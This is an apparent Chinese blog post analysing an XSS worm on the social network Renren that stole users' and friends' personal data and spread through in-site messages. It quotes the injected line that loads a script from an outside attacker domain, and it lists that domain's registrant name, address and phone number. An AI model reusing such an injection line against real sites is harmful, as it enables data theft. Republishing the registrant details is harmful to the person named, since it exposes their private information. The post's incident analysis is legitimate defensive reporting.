人人网在30号凌晨开始,发生一场大规模资料泄露事件。黑客使用人人网在站内信内容过滤不严的漏洞执行了一段远程代码,打开站内信后会自动发送自己以及好友的个人资料,同时扩散这封站内信。
今天收到三份主题为<有人暗恋你哦,你想知道TA是谁么>
的站内信, 开始以为是游戏应用的推广方式,但是打开后发现有问题
,通过查看站内信网页源码,发现其中有一行代码<script src='http://qiutuan.net/2011/51.js'>,它通过利用人人网的代码解析方式问题,
将本不该在文本中执行的代码执行了。分析代码后发现其主要目的是收集用户的人人id、学校、生日、姓名、qq、msn、手机,然后通过通讯录功能,得到所有好友名片中的上述信息,然后将所有信息发送到作者的网站上。
另外在代码中关于发送站内信的函数megaboxx.submit_prehook并不是人人网本身的函数,
而是来自于facebook。
人人网最初的措施是将指向的网址设为敏感词。
凌晨3点半左右,人人开始清理站内信。但是这个漏洞依然存在。
这一波资料泄露到此结束。下一波何时到来?
黑客利用的域名qiutuan.net的注册信息
dasha, wang [email protected]
hubeishengwuhanshi
wuhan, 518089
China
+1.18603051234 Fax –
注册地址是湖北武汉.
但是邮编显示为深圳